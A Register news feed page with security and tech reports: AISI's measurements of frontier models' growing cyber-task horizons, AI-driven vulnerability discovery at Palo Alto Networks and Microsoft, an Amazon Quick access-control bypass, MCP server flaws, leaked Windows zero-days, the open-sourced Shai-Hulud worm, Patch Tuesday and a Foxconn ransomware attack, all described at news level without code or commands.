News

AI models are getting better at replacing cybersecurity pros on certain tasks

The Register - 1 hour 6 min ago
The UK AI Security Institute (AISI) has found that frontier models are quickly becoming more efficient when asked to do some cybersecurity work. AISI measures this with its "time window benchmark for cybersecurity," which estimates how much work an AI can do compared to a human. Using the benchmark could lead to findings such as Claude Sonnet 4.5 can do what a human cybersecurity expert can do in 16 minutes about 80 percent of the time, given a budget of 2.5m tokens. AISI has found the human-comparable task time – 16 minutes in this instance – is growing, fast. If tokens flowed freely instead of being arbitrarily capped, AI models might do better still. In February 2026, AISI internally reduced the expected task time doubling period from 8 to 4.7 months, based on progress made since late 2024. With the release of Anthropic Mythos Preview and OpenAI GPT-5.5, AISI has once again had to compress its projected doubling period. "In February 2026, we estimated that frontier models' 80 percent-reliability cyber time horizon had doubled every 4.7 months since reasoning models emerged in late 2024, given a 2.5M token limit," the AISI said in a post on Wednesday. "This was around half our November 2025 doubling time estimate, which was 8 months for both 50 percent and 80 percent reliability. Claude Mythos Preview and GPT-5.5 have since significantly outperformed this trend." The recalculated doubling time estimate, given what Mythos Preview and GPT-5.5 can do, is even shorter than 4.7 months. AISA does not cite a specific value but the organization points to similar time horizon estimates based on measurements of a broader skillset, software engineering, made by non-profit AI research house METR. "Their results imply a consistent doubling time of 4.2 months on software tasks since late 2024," AISI said, noting that with the latest Mythos Preview checkpoint (model update), it's closer to 4 months. Note that the time window benchmark is not a broad assessment of capabilities – AISI is not saying frontier models are becoming twice as capable by all measures. It's a narrow assessment based on the time it takes people to accomplish security tasks. Citing a different metric, AISI says the latest Mythos Preview checkpoint solved a 32-step simulated corporate network attack called "The Last Ones" in six of 10 attempts and managed to complete a previously unsolved challenge, a seven-step industrial control system attack called "Cooling Tower," in three of 10 attempts. As a point of comparison, when Opus 4.6 was evaluated in February 2026, it completed a maximum of 22 of 32 steps for The Last Ones. That model managed to reach milestone 6, which involves reverse-engineering a Windows service binary to access encrypted credentials, escalating privileges via token impersonation, and recovering a cryptographic key to access a command-and-control management service. "Frontier AI's autonomous cyber and software capability is advancing quickly: the length of cyber tasks that frontier models can complete autonomously has doubled on the order of months, not years," AISI concludes. "What this evidence does not tell us is how the pace of progress will evolve, when AI will reach any particular capability threshold, or how these capabilities will translate against defended, real-world systems." The curl project offers one data point with regard to the real world implications of the latest frontier models: Mythos managed to find just one confirmed vulnerability in its codebase. But watch this space. ®
Categories: News

Cisco to fire 4,000 staff and generously give them free training – on Cisco

The Register - 4 hours 22 sec ago
Cisco will make around five percent of staff redundant and has generously offered them free Cisco training for a year once they’re gone. CEO Chuck Robbins broke the news in a Wednesday blog post titled “Our Path Forward” that opens “Today we announced our Q3 FY26 earnings with record revenue of $15.8 billion, up 12 percent year over year, and double-digit top and bottom-line growth. The ELT [executive leadership team] and I could not be prouder of the growth you have all delivered for Cisco.” That growth included net income growing 35 percent to $3.4 billion. Yet Robbins’ pride was not sufficient for all Cisco staff to keep their jobs. The CEO said the layoffs are necessary because “The companies that will win in the AI era will be those with focus, urgency, and the discipline to continuously shift investment toward the areas where demand and long-term value creation are strongest.” For Cisco that means “reducing roles in some areas” and also “making clear, strategic investments – particularly in silicon, optics, security, and in our employees’ use of AI across the company.” On Thursday, US time, close to 4,000 unlucky Cisco staff will be shown the door. Robbins said Cisco will help its soon-to-be-former workers find their next gig, and that the company’s efforts to do so have a 75 percent success rate. “We are also committed to continued personalized learning and will provide one year of access to all Cisco U courses and certifications, covering AI, Security, Networking, and more,” he added. Cisco made two big rounds of layoffs in 2024, one of which ejected seven percent of staff and the other resulted in Cisco firing five percent of employees. The restructures appear not to have slowed the company down: Robbins said product orders in Q3 rose 35 percent year over year – a figure that encapsulates a 105 percent year-over-year surge in revenue from hyperscalers and more modest 18 percent growth from other buyers. Robbins said Cisco has already scored $5.3 billion of AI infrastructure sales this year, and forecast full-year sales of $9 billion – 4.5 times its haul from last year. More prosaic products, like Wi-Fi kit, also grew fast as sales rose 40 percent. The company hopes to keep that cash flowing by building wireless kit that uses less memory. “You’ll see products that’ll become orderable in Q4 that’ll actually require 50 percent less memory,” Robbins said, with the design work to make that possible an example of the “20-plus programs that we’ve put into place that are active to reduce the memory utilization across the portfolio.” Cisco’s doing that despite the rising price of memory and storage not putting a dent in its margins, an outcome that execs attributed to supply chain management efforts. Glasswing to lift security sales Later in the earnings call, Robbins revealed that Cisco is participating in Anthropic’s Project Glasswing and using the Mythos model to test its code. The CEO said another impact of Anthropic’s bug-finding AI will be to accelerate plans to replace security appliances once other vendor’s use of Mythos finds flaw that are hard to fix. “I actually think while there will be a security opportunity, there’s going to most likely be a lot of focus from our customers on modernizing their infrastructure so that they don’t have this risk from technology that just can’t be patched,” Robbins said. Robbins said Cisco may have won an order or two from customers who were already close to replacing old security kit “and Mythos pushed them over the edge.” But he said Cisco didn’t receive “any meaningful orders in Q3 as a result of Mythos, but that could change in the future as we continue to work with customers.” ®
Categories: News

Welcome to the vulnpocalypse, as vendors use AI to find bugs and patches multiply like rabbits

The Register - 8 hours 5 min ago
The vulnpocalypse has begun. Palo Alto Networks usually finds five vulnerabilities a month, but on Wednesday said it scanned its entire codecase using the latest frontier models, including Anthropic’s Mythos, and found 75 security holes, covered in 26 CVEs. This comes a day after Microsoft said it used its new agentic bug hunting system called MDASH to find 17 vulnerabilities across its products - on a record-setting Patch Tuesday that saw Redmond disclose a whopping 30 critical CVEs. Plus, last week Mozilla said it fixed 423 Firefox bugs in April, which is more than five times higher than the 76 fixes issued in March and almost 20 times higher than its 21.5 monthly average last year. The browser maker previously said Mythos found 271 flaws in Firefox 150. It shouldn’t be all that shocking. Security vendors have long warned about attackers using AI, and how this means defenders need to operate at AI speed to protect their own networks and systems (aka buying their AI-infused products). Now that models have become really good at finding bugs in code, security shops are using AI to scan their own software, hopefully to uncover and fix flaws before the baddies do. And this trickles down to two things: more patches, and more work for admins. Zero Day Initiative’s chief vuln finder Dustin Childs agrees with this assessment. “At first, yes, this means more patches and thus more work for admins,” he told The Register. “The goal over time would be to eliminate as many as possible, and, over time, that monthly number goes down.” What will make this whole AI bug hunting season “really painful,” he continued, is if the patches don’t work or - worse yet - break things. “Many customers don’t trust patches as it is, so if AI-related patches break things, they are less likely to apply as time goes on,” Childs added. “This will be true even if AI only finds the bugs and doesn’t make the patches.” Bug hunting on steroids This isn’t to say security companies should avoid AI to find and fix flaws. “All vendors should use what tools they have to find and remediate bugs before they are exploited in the wild,” Childs said. “Ideally, they would find the bugs before they even ship, but I’m not holding my breath for that to happen.” Both Microsoft and Palo Alto Networks (PAN) are part of Anthropic’s Project Glasswing, which means they are among the select group of entities allowed to test Mythos, the much-hyped LLM, to find security holes in their own products. Palo Alto Networks began testing Mythos on April 7, and has since continued using the LLM and other frontier models, including Claude Opus 4.7 and OpenAI’s GPT-5.5-Cyber, according to product manager Lee Klarich. “Today, we released our May ‘Patch Wednesday’ security advisories,” Klarich said in a Wednesday blog, adding that “this is the first time where the majority of findings were the result of frontier AI models scanning our code.” The LLMs scanned over 130 Palo Alto Networks products and platforms platforms, and as noted above found 75 issues, covered in 26 CVEs. None of these bugs are under exploitation, and as of Wednesday the company has fixed all bugs in its SaaS-delivered products and coded patches for all customer-operated products. Maybe 5 months before 'AI-driven exploits the new norm' “We intend to fix every vulnerability we find before advanced AI capabilities become widely available to adversaries,” Klarich said in his blog, adding that his company expects “a narrow three-to-five-month window for organizations to outpace the adversary before AI-driven exploits start to become the new norm.” A day earlier, Microsoft said its new multi-model agentic scanning harness (codename MDASH) helped researchers find 16 new vulnerabilities across the Windows networking and authentication stack, as disclosed in May’s Patch Tuesday event. This included four critical remote code execution flaws in components such as the Windows kernel TCP/IP stack and the IKEv2 service. “Unlike single-model approaches, the harness orchestrates more than 100 specialized AI agents across an ensemble of frontier and distilled models to discover, debate, and prove exploitable bugs end-to-end,” Microsoft VP of agentic security Taesoo Kim said in a Tuesday blog. Tom Gallagher, VP of engineering at Microsoft Security Response Center, admitted that “this month's release sits on the larger side of a hotpatch month.” Gallagher said he expects AI-assisted bug hunting to increase Patch Tuesday releases as both Microsoft and third-party researchers use these tools to boost vulnerability discovery. And yes, all of this ultimately means more patches and more work. More patches = more work “Finding bugs has always been the cheap end of the pipeline,” Luta CEO Katie Moussouris told The Register. “Triage, disclosure, building patches that do not break production, and getting customers to deploy them is the expensive end, and nobody has funded it for this volume.” Moussouris helped convince Redmond's top brass that Microsoft needed a bug bounty program in 2013, and three years later started her own bug bounty consultancy. She noted Palo Alto Networks’ staggering jump in CVEs this month. “Multiply that across every vendor and the bottleneck becomes admins and vulnerability management teams,” Moussouris said. And she also stressed that people should be using these new models to find vulnerabilities. “It is exactly what defenders should be doing,” Moussouris said. “Both PAN and Microsoft landed on the same answer: no single model catches everything. PAN ran Claude Mythos, Claude Opus 4.7, and GPT-5.5-Cyber because each finds bugs the others miss,” she added. “Microsoft orchestrates over 100 specialized agents across multiple models. Add threat intel and codebase context, and Microsoft rediscovered 96 percent of five years of confirmed bugs in a critical Windows component. The asymmetry is temporary, PAN puts adversary parity at three to five months, so any vendor not scanning their own code now is letting someone else find their bugs first.”®
Categories: News

AWS to Quick admins: The access control didn't work, but you weren't using it anyway, so what's the problem?

The Register - Wed, 13/05/2026 - 23:56
Most users put up with AWS the way you put up with the DMV. I say this with love, but it's hard to disagree that the UI is awful. The console is a UX time capsule if time capsules weren't allowed to ever look like other time capsules. The pricing pages were designed by someone who hates you personally, and you accept all of it because the one thing AWS has historically gotten right is the boring, important stuff. The security model. The IAM language no one likes, but everyone trusts. The boundary between your account and someone else's. Get that wrong, and the whole bargain collapses. So when Fog Security disclosed an authorization bypass in Amazon Quick on May 12 (that's the BI service formerly known as QuickSight, briefly known as Quick Suite, and now apparently just Quick, but check back next week) and AWS responded with a statement claiming "no customer data was at risk," it's fair to ask which definition of customer data they're using. Because it isn't an obvious one, and it certainly isn't mine. What Fog found Fog reports that when an Amazon Quick administrator (which is an absolutely devastating personal insult) uses "custom permissions" to explicitly deny access to AI Chat Agents, the UI correctly hides the feature. Great! Awesome! I sure wish to hell I could do that with S3 buckets to which I do not have access! Notably, there's no other way for an admin to do this - it's custom permissions or naught. The API, however, was perfectly willing to keep answering chat requests for any user in the account who knew how to send them. Fog's proof-of-concept was a non-admin asking the agent "Tell me about mangoes" from a session that was, on paper, locked out of the agent entirely. The agent told them about mangoes. AWS deployed the fix between March 11 and March 12, eight days after Fog reported it via HackerOne. So far, so coordinated. Seriously, for a company of this scale, that's underpants-outside-the-pants superhero speed. Good for you; gold star. What came next Where this gets uncomfortable is the response. AWS classified the severity as "none." It issued no customer notification. It published no advisory. After Fog disclosed the HackerOne report and published a blog post, AWS provided a statement to Fog Security reading, in full: "We appreciate Fog Security's coordinated disclosure. This issue was addressed in March 2026. No customer data was at risk and there is no customer action required. As always, customers can contact AWS Support with any questions or concerns about the security of their account." Take that sentence apart and see how much work "no customer data was at risk" is doing. Amazon Quick is described on its own product page as an AI assistant that "connects Slack, Microsoft Teams and Outlook, CRMs, databases, and documents in one place" and "grounds every answer in your real business data." The default chat agent, which is automatically and annoyingly provisioned the instant Quick is enabled whether the customer wants those AI features or not, is the front end for that data. It is the whole point of the front end for that data. Now consider the actual scenario AWS just patched. An administrator at, say, a regulated bank (an unregulated bank is called "a criminal enterprise that hasn't been caught yet") configures custom permissions denying chat agent access to a large group of users. Maybe those users are contractors. Maybe they're in a business unit that isn't cleared for AI tools. Maybe the bank's compliance posture flat-out prohibits shadow AI usage on top of internal data. Until two months ago, every one of those users could send an HTTP request directly to the agent endpoint and get a response. Fog asked about mangoes because they're a security firm doing a clean disclosure, not a malicious insider. A malicious insider would not have asked about mangoes. The question to AWS, with no rhetoric attached: In what sense was customer data not at risk? Either the chat agent doesn't actually have access to the data the product page says it does (in which case the marketing department has some serious splainin' to do) or unauthorized users could query an agent wired into customer data, in which case "customer data was at risk" is the correct English-language description of the situation. AWS clarifies, and says the quiet part out loud After this story started circulating, AWS offered a follow-up comment that I sincerely appreciate, because it's so much more honest than the first one. Per a hounded-looking AWS spokesperson: "The researcher was using the Admin Control capability that no customers were actively using when the server side validation was not present." Reading that twice doesn't help. Let me translate. AWS is saying: Yes, the server-side authorization check was missing. Yes, an authenticated user in your Quick account could bypass the only access control mechanism the service offers. The reason this is fine, apparently, is that no real customer had bothered to configure that access control during the window when it didn't work. Um ... what? The defense isn't "the bug wasn't real," which you could be forgiven for hearing in AWS's first statement. The defense also isn't "the bug couldn't have done what Fog says it could have done," which is the even stronger implication of their first statement. The defense is "the access control didn't enforce what we said it did, but luckily nobody was relying on it." This is the corporate-comms equivalent of "the lock on the front door didn't work, but nobody had locked it anyway, so why are you upset?" It's also a surprisingly specific telemetry claim. AWS is asserting that they know zero customers had configured custom permissions to deny chat agent access during the exposure window. That's a confident thing to say, and an even more interesting thing to volunteer as a defense, because it doubles as a withering review of Quick's access management model: the only knob the service provides for this purpose, the one AWS's own documentation explicitly tells administrators to use, has zero recorded uptake. The same follow-up also pointed back to the HackerOne thread to demonstrate that AWS told Fog throughout the disclosure window that "user-based authorization remained enforced." Translation: you needed authenticated credentials in the same Quick account to exploit this. Yes. That's intra-account scope, which Fog documented in their writeup, and which is precisely the scope in which custom permissions are supposed to function as a security boundary. AWS saying "user-based authorization was fine" is saying "you couldn't exploit this anonymously from the internet," which was never the threat model in question. The threat model is the contractor with valid SSO credentials whose admin tried to lock them out of some datasets. Why this matters more than it sounds Amazon Quick's access model is already an outlier: IAM policies don't govern Quick's AI Chat Agent, SCPs don't apply, and RCPs don't apply. Custom permissions are the only knob the service provides. If those don't enforce, nothing else does. And per AWS's own follow-up, literally nobody was using them anyway. Both halves of that sentence should be alarming, and AWS is offering them as reassurance. AWS's competitive moat for the last decade hasn't been pricing. It sure as poop hasn't been developer experience, documentation, console design, or the inscrutable poetry of service names. It's been the well-earned belief that AWS gets the foundational things right: boundaries, identity, durability, reliability, and the parts customers can't easily verify themselves. Customers have paid the AWS premium because they trusted the boring stuff. This year that trust is being tested in a way it hasn't been before. The 2025–2026 cadence of AWS security advisories has noticeably increased, for reasons that are as yet unclear. Coordinated disclosures from independent researchers keep surfacing missing authorization checks in newer, AI-adjacent services. The fixes are landing fast, which is good. The customer communication isn't landing at all, which is, charitably, a choice. A "severity: none" rating on a bypass of the only access control a service offers is not an objective security finding so much as it is a communication decision. And the communication decision now reads, with the benefit of AWS's follow-up: "We'll fix the bug, we won't tell you it existed, and if you ask we'll explain that you weren't using the feature anyway." AWS gets a lot of forgiveness on the small stuff because they own the big stuff. They might want to reconsider how much of the big stuff they keep classifying as "none." ®
Categories: News

Bug hunter tracks down three massive MCP flaws and one vendor won't fix theirs

The Register - Wed, 13/05/2026 - 21:17
Security vulnerabilities in MCP servers for three popular database projects could let attackers execute unintended SQL statements on Apache Doris, exfiltrate sensitive metadata from Alibaba RDS, and potentially take over Apache Pinot instances exposed to the internet. Alibaba, meanwhile, declined to patch its flaw. Apache issued a patch and a CVE tracker for Doris MCP, and there’s an open ticket in the MCP Pinot Github repository for the flaw, we're told. However, Alibaba decided not to patch the vulnerability in RDS MCP, according to Akamai security analyst Tomer Peled, who wrote about the flaws on Tuesday and will present his full research next month at x33fcon. MCP, or Model Context Protocol, is an open source protocol originally developed by Anthropic that allows LLMs, AI applications, and agents to connect to external data, systems, and one another. While security issues are never a good thing - and they are especially concerning when they exist in a server sitting between an AI agent and a production database, these in particular point to a larger problem in the way MCPs are developed. “There is missing or faulty security validation between the MCP server and its back end,” Peled wrote, adding that these security “gaps will become high-value targets for attackers and we expect more of these issues to surface.” Here’s a closer look at all three, starting with the flaw that has since been fixed and assigned a CVE. Apache Doris is a high-speed analytics and search database with more than 10,000 mid- and large-enterprise users. Its MCP server allows AI agents to interact with and perform operations on Doris instances. This includes SQL queries or retrieving table and schema metadata - and foreshadows the found flaw: CVE-2025-66335, a SQL injection vulnerability, that affects Apache Doris MCP Server versions earlier than 0.6.1. When an MCP tool is called, the server’s “exec_query” function fails to validate one of the five parameters (the db_name parameter) before constructing the SQL query. This means an attacker can invoke the function and inject malicious SQL through the db_name parameter, which gets prepended to the beginning of the final SQL statement. Plus, the SQL validator only checks the first portion of the query, so all it sees is the attacker’s directive. “As a result, any attacker that gains access to a client connected to the Doris MCP server can execute arbitrary commands on the victim’s Apache Doris instance,” Peled said. Apache issued a patch in December to fix this flaw. The second issue, an authentication validation bypass in Apache Pinot MCP, can also lead to SQL injection attacks and full database takeover. Apache Pinot is another super-fast analytics database, and StarTree’s MCP integration for Pinot before v2.0.0 allowed users to run queries directly from their AI agent against their Pinot instance. The open-source project uses HTTP as the transport layer without requiring any type of authentication. This exposes the endpoint to remote attackers who can reach it, allowing them to invoke MCP tools, including those used for SQL execution. “In environments where the MCP endpoint is reachable externally, this behavior allows unauthenticated attackers to execute queries against the Pinot instance, which can allow a full remote takeover of the database,” Peled wrote. StarTree has since added OAuth as an authentication option when using HTTP, which he says lowers the threat of SQL injection (but it still exists in the code), and Apache has also opened a security issue in the MCP Pinot github repository. Pinot MCP v1.1.0 and earlier versions are affected. Neither Apache nor StarTree responded to The Register’s requests for comment. The third security flaw, an information disclosure issue in the Alibaba RDS MCP server, also stems from the server not authenticating users before invoking the retrieval-augmented generation (RAG) MCP tool, which allows AI models to connect with and query databases. This means “any client able to reach the MCP endpoint can issue requests to the server without any query validation,” according to Peled. “The vector index may contain table names, schema definitions, or other potentially sensitive metadata, and unauthenticated attackers can exfiltrate this data with little or no effort." All versions of Alibaba RDS MCP are affected by this vuln. The bug hunter says that he reported the issue to Alibaba in November, and the cloud giant told him the issue is “not applicable” for a fix - so it’s still in the codebase. Akamai also reported this inaction to the CERT Coordination Center (CERT/CC). Alibaba did not respond to The Register’s inquiries. Peled said that the threat-hunting team, upon starting this investigation, assumed that there would be some baseline security specification for all MCP servers. Turns out they were wrong, and as the research found, flaws like SQL injection, missing authentication, and insufficient query validation exist in the code. “This means that more attention should be given not just to the specification but also to the best security practices guides when developing secure MCP servers,” he wrote.®
Categories: News

Mystery Microsoft bug leaker keeps the zero-days coming

The Register - Wed, 13/05/2026 - 17:16
The anonymous security researcher who has already maliciously exposed three Windows zero-days this year has revealed two more, dropping them just after Microsoft's monthly Patch Tuesday update. Nightmare-Eclipse, or Chaotic Eclipse, depending on which of their aliases you prefer, released details about YellowKey and GreenPlasma - respectively a BitLocker bypass and a privilege escalation flaw, handing SYSTEM access to attackers. Experts speaking to The Register warned that both vulnerabilities present serious security concerns, especially since Nightmare-Eclipse released substantial technical information about exploiting them. Nightmare-Eclipse described YellowKey as "one of the most insane discoveries I ever found." They provided the files, which have to be loaded onto a USB drive, and if the attacker completes the key sequence correctly, they are granted unrestricted shell access to a BitLocker-protected machine. When it comes to claims like these, we usually exercise some caution, as this bug requires physical access to a Windows PC. However, seeing that BitLocker acts as Windows' last line of defense for stolen devices, bypassing the technology grants thieves the ability to access encrypted files. Rik Ferguson, VP of security intelligence at Forescout, said: "If [the researcher's claim] holds up, a stolen laptop stops being a hardware problem and becomes a breach notification." Despite the physical access requirement, Gavin Knapp, cyber threat intelligence principal lead at Bridewell, told The Register that YellowKey remains "a huge security problem for organizations using BitLocker." Citing information shared in cyber threat intelligence circles, he added that YellowKey can be mitigated by implementing a BitLocker PIN and a BIOS password lock. Nightmare-Eclipse hinted at YellowKey also acting as a backdoor, allegedly injected by Microsoft, although the people we spoke to said this was impossible to verify based on the information available. The researcher also published partial exploit code for GreenPlasma, rather than a fully formed proof of concept exploit (PoC). Ferguson noted attackers need to take the code provided by the researcher and figure out how to weaponize it themselves, which is no small task: in its current state it triggers a UAC consent prompt in default Windows configurations, meaning a silent exploit remains a work in progress. Knapp warned that these kinds of privilege escalation flaws are often used by attackers after they gain an initial foothold in a victim's system. "These elevation of privilege vulnerabilities are often weaponized during post-exploitation to enable threat actors to discover and harvest credentials and data, before moving laterally to other systems, prior to end goals such as data theft and/or ransomware deployment," he said. "Currently, there is no known mitigation for GreenPlasma. It will be important to patch when Microsoft addresses the issue." Four, five… and more? YellowKey and GreenPlasma are the latest in a series of five Microsoft zero-day bugs the researcher has exposed this year. When Nightmare-Eclipse released BlueHammer (CVE-2026-32201, 6.5) - patched by Microsoft in April - they were described as a disgruntled researcher who has since been rumored to be a former Microsoft employee. According to their maiden blog post under the Chaotic Eclipse alias, the bug leak began after an alleged violation of trust. "I never wanted to reopen a blog and a new GitHub account to drop code," they wrote. "But someone violated our agreement and left me homeless with nothing. They knew this will happen and they still stabbed me in the back anyways, this is their decision not mine." In early April, the researcher leaked proof-of-concept code for Windows Defender exploits they called RedSun and UnDefend - another admin privilege escalation bug and denial-of-service flaw, respectively - as well as BlueHammer. Both RedSun and UnDefend remain unfixed, and according to Huntress, the proof-of-concept code released was quickly picked up and abused in real-world attacks. Ferguson described the exposure of YellowKey and GreenPlasma as the latest in an escalating, retaliatory campaign against Microsoft, and warned of more coming. "Prior releases include BlueHammer and RedSun, both of which attracted serious community attention and real forks," he said. "The same post linking yesterday's releases warns of another Patch Tuesday surprise and hints at future RCE disclosures. They claim to have a dead man's switch with more ready to go. This researcher has followed through on every prior threat." ®
Categories: News

Malware crew TeamPCP open-sources its Shai-Hulud worm on GitHub

The Register - Wed, 13/05/2026 - 07:23
Notorious malware crew TeamPCP appears to have open-sourced its Shai-Hulud worm. Security outfit Ox on Tuesday spotted a pair of repos on GitHub, both of which contain the following text: Shai-Hulud: Open Sourcing The Carnage Is it vibe coded? Yes. Does it work? Let results speak. Change keys and C2 as needed. Love - TeamPCP The Register checked out the repos a few hours before publishing this story and at the time one listed a single fork, and the other mentioned 31. At the time of writing, those numbers have grown to five and 39. That growth accords with Ox’s assertion that “independent threat actors have already begun modifying it and expanding its reach.” Ox’s analysts looked at the source code in the repos and believe it displays “the same patterns from previous Shai-Hulud attacks are immediately recognizable, as expected. This includes uploading stolen credentials to a new GitHub repository.” “TeamPCP isn’t just spreading malware anymore – they’re spreading capability. By going open source, they’ve handed any willing actor the tools to build their own variant. The copycats are already here,” Ox opined. TeamPCP may also be using different handles to spread the malware, a theory Ox advanced after spotting another GitHub user named “agwagwagwa” that it says has already forked the malware and submitted a pull request adding FreeBSD support.” “TeamPCP’s theme is cats, and agwagwagwa’s GitHub account has a ‘meow!’ repository inside,” Ox noted, before doing a quick Q&A: “Does this mean they are part of the group? We can’t know for sure, but it is very, very suspicious.” The Shai-Hulud worm attacks npm packages, and if it can infect them looks for credentials for users of AWS, GCP, Azure, and GitHub credentials. If it gains access, it creates and publishes poisoned code to perpetuate itself. If the malware can’t achieve its objectives, it sometimes tries to wipe the local environment in an act of self-destructive vengeance. Researchers found the malware in September 2025, and a more powerful variant appeared in November of the same year . Imitators have since created copycat malware, and the original has rampaged its way across the internet. Malware authors sometimes sell their wares so that other miscreants can adapt it to their own needs. However, it is unusual for cyber-crims to give away their work. TeamPCP chose the MIT License, which allows just about any re-use of code. At the time of writing, the Shai-Hulud repos have been online for at least 12 hours and Microsoft’s GitHub appears not to have intervened. ®
Categories: News

Vietnam to develop domestic cloud so it can ditch risky overseas operators for government workloads

The Register - Wed, 13/05/2026 - 04:44
Vietnam has decided to develop its own cloud platform, so its government agencies can stop using foreign-owned services. Prime Minister Le Minh Hung last week announced the plan in Decision 808/QD-TTg, which lists 20 strategic technologies Vietnam wants to develop to improve its technological self-reliance and give its government the tools to tackle national challenges. Developing a national cloud computing platform is number 13 on the list. Machine translation of Decision 808 yields the following goals for the project: “Ensuring national data sovereignty and cybersecurity for the digital government and key digital economic infrastructures; forming a centralized, secure, and reliable digital and data infrastructure to serve national digital transformation; gradually replacing foreign cloud services in state agencies, reducing the risk of data leaks and breaches of state secrets.” The move is a sign that Vietnam’s government, like many others, fears entanglements with cloud providers that may struggle to escape edicts from their home jurisdictions. Yet major hyperscalers Microsoft, Google, and Tencent Cloud are yet to build facilities in Vietnam. AWS will bring one of its lightweight Local Zones to Hanoi, Alibaba Cloud intends to build a datacenter, and Huawei Cloud has expressed interest in doing likewise. Vietnam’s government wants more love from hyperscalers – the nation’s Deputy PM recently met with AWS officials and called for greater co-operation. Yet any Vietnamese government workloads currently operating in a major hyperscaler violate the nation’s own laws that require local storage of personal information! Other technologies Vietnam wants to develop include a large-scale Vietnamese language model, virtual assistants, and AI to power applications including cameras, credit risk management, and something that translates as “a national smart education platform applying controlled AI.” The nation also wants its own next-generation firewall; anti-malware software, a next-generation SIEM system, and an “AI-integrated security operations center platform.” Quantum-resistant encryption also makes the list, as does a “user and entity behavior analysis system.” Rare earth processing is another capability Vietnam desires, as are 5G expertise, the ability to build and operate autonomous and industrial robots, and improved semiconductor design skills. Vietnam is in a hurry: Decision 808 set a 2030 deadline to get this all done. According to a Tuesday post to a government news platform, 2030 is also the year in which Hanoi expects all core government services will be online, and digital infrastructure enables outcomes such as “Ensuring social welfare and supporting crime prevention and control, national security, and social order and safety” plus “Supporting scientific research and innovation.” And in 2035, Vietnam “will become a developed digital nation” in which “National databases, with population data serving as the core, will be interconnected, shared, and effectively utilized to support the development of a smart government, enabling data-driven decision-making based on real-time information.” Smart government will mean “Citizens will benefit from personalized, automated, and convenient digital services tailored to different life events.” What a time to be alive. ®
Categories: News

Doozy of a Patch Tuesday includes 30 critical Microsoft CVEs

The Register - Wed, 13/05/2026 - 00:51
Microsoft released fixes for 137 CVEs on Tuesday, none of which are known to have been targeted by attackers. But the news is not all good as Redmond rated a whopping 30 flaws as critical, with 14 earning a 9.0 or higher CVSS severity rating, including one perfect 10. Plus, everyone who celebrates the monthly patchapalooza event received validation for what we all widely suspected last month: Yes, Redmond (and everyone else, for that matter) is using AI to find a ton more bugs than ever before. And that means a lot more work for all the folks applying and testing the patches. “This month's release sits on the larger side of a hotpatch month, and we expect releases to continue trending larger for some time,” Tom Gallagher, VP of engineering at Microsoft Security Response Center, said in a note on this month's Patch Tuesday. Microsoft also said its secret-until-now AI bug hunting system, codenamed MDASH, found 16 of the vulnerabilities addressed in this month’s release. Redmond additionally announced it is making the tool available to a limited number of customers in private preview, along the lines of Anthropic’s Mythos and Project Glasswing. In other words: no break for Microsoft admins this May Patch Tuesday. Let’s take a look at some of the nastiest/most-interesting bugs that also received some of the highest-CVSS ratings this month, coming in hot at 9.8 and 9.9. First up: CVE-2026-41096. This one is a critical, 9.8-rated Windows DNS Client remote code execution (RCE), and while Redmond says exploitation is “unlikely,” we’d suggest patching it ASAP. It’s due to a heap-based buffer overflow, and no authentication or user interaction is needed to exploit it (it's done by sending a specially crafted DNS response to a vulnerable system), potentially leading to memory corruption and RCE. “Since the DNS Client runs on virtually every Windows machine, the attack surface is enormous,” Zero Day Initiative bug hunting boss Dustin Childs warned. “An attacker with a position to influence DNS responses (MitM, rogue server) could achieve unauthenticated RCE across your enterprise.” Plus, it could happen across a ton of enterprise systems very rapidly, Jack Bicer, Action1 vulnerability research director told The Register. “This CVE requires immediate attention,” he said. “Successful attacks may lead to widespread endpoint compromise, ransomware deployment, credential harvesting, and operational disruption across corporate networks.” Another especially bad bug, CVE-2026-42898 in Microsoft Dynamics 365 on-premises systems, achieved a near-perfect 9.9 CVSS rating and also leads to RCE. Any authenticated user can trigger this vuln - it doesn’t require admin or other elevated privileges. As Redmond explains: “An attacker with the required permissions could modify the saved state of a process session in Dynamics CRM and trigger the system to process that data, which could result in the server unintentionally executing malicious code.” Since exploitation could lead to a scope change, meaning the bug can affect systems beyond the vulnerable component, it’s a pretty serious risk to enterprises and should be prioritized. “Scope changes are pretty rare, so if you’re running Dynamics 365 On-Prem, definitely test and deploy this patch quickly,” Childs said. The second of two 9.8-rated bugs is CVE-2026-41089. It’s a stack-based buffer overflow in Windows Netlogon that allows an unauthenticated, remote attacker to execute code on vulnerable machines by sending a specially crafted network request to a Windows server acting as a domain controller. As Childs points out: the fact attackers can exploit this flaw without credentials or user interactions makes it wormable “This is the highest-impact bug that requires immediate patching: a compromised domain controller is a compromised domain,” he added. The silver lining this month for defenders is that the single CVE earning a perfect 10.0 CVSS rating is in Azure DevOps, and doesn’t require users to fix anything. CVE-2026-42826 is an information disclosure vulnerability in the DevOps toolchain “has already been fully mitigated by Microsoft,” according to Redmond. “There is no action for users of this service to take. The purpose of this CVE is to provide further transparency.” ®
Categories: News

Foxconn confirms cyberattack after ransomware crew claims it stole confidential Apple, Nvidia files

The Register - Tue, 12/05/2026 - 23:02
Foxconn, a critical supplier for major hardware companies like Apple and Nvidia, on Tuesday confirmed a cyberattack affecting its North American operations after the Nitrogen ransomware gang listed the electronics manufacturer on its data leak site. “Some of Foxconn's factories in North America suffered a cyberattack,” a Foxconn spokesperson told The Register. “The cybersecurity team immediately activated the response mechanism and implemented multiple operational measures to ensure the continuity of production and delivery. The affected factories are currently resuming normal production.” Nitrogen ransomware criminals on Monday claimed to have breached the Taiwan-based company and stolen 8 TB of data comprising more than 11 million files. The miscreants say the leaks include confidential instructions, internal project documentation, and technical drawings related to projects at Intel, Apple, Google, Dell, and Nvidia, among others. Foxconn declined to confirm that these - or any - customers’ information was hoovered up in the digital intrusion. Nitrogen, which has been around since 2023, is believed to be one of the various ransomware offshoots that borrowed code from the leaked Conti 2 builder. And, in what may be very bad news for its latest victim, even paying the ransom demand may not guarantee recovery of encrypted files. In February, Coveware researchers warned that a programming error prevents the gang's decryptor from recovering victims' files, so paying up is futile. The finding specifically concerns the group's malware that targets VMware ESXi. This isn’t the first time Foxconn has been targeted by ransomware gangs. In 2024, LockBit claimed to have infected Foxsemicon Integrated Technology, a semiconductor equipment manufacturer within the Foxconn Technology Group. The same criminal crew also hit a Foxconn subsidiary in Mexico in 2022. ®
Categories: News

US bank reports itself after slinging customer data at 'unauthorized AI app'

The Register - Tue, 12/05/2026 - 15:50
